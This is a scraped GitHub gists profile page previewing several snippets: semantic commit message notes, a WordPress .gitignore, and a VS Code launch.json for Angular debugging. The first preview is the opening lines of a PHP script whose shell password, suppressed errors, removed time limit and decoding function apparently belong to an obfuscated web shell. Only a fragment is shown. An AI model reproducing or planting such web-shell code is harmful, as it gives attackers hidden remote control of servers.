Skip to content

Instantly share code, notes, and snippets.

View edmarfelipe's full-sized avatar

Edmar Felipe edmarfelipe

View GitHub Profile
<?php
$password='123456';
$shellname='123456';
$myurl=null;
error_reporting(0);
@set_time_limit(0);
function Class_UC_key($string){
$array = strlen (trim($string));
$debuger = '';
for($one = 0;$one < $array;$one+=2) {

Semantic Commit Messages

See how a minor change to your commit message style can make you a better programmer.

Format: <type>(<scope>): <subject>

<scope> is optional

Example

@edmarfelipe
edmarfelipe / .gitignore
Created January 21, 2020 17:51 — forked from salcode/.gitignore
See https://salferrarello.com/wordpress-gitignore/ for the latest version of my WordPress .gitignore file
# -----------------------------------------------------------------
# .gitignore for WordPress
# Bare Minimum Git
# http://ironco.de/bare-minimum-git/
# ver 20150227
#
# This file is tailored for a WordPress project
# using the default directory structure
#
# This file specifies intentionally untracked files to ignore
@edmarfelipe
edmarfelipe / launch.json
Created May 15, 2018 16:42 — forked from tonysneed/launch.json
Chrome Debugging with VS Code and Angular CLI
{
"version": "0.2.0",
"configurations": [
{
"type": "chrome",
"request": "launch",
"name": "ng serve",
"url": "http://localhost:4200/#",
"webRoot": "${workspaceRoot}"
},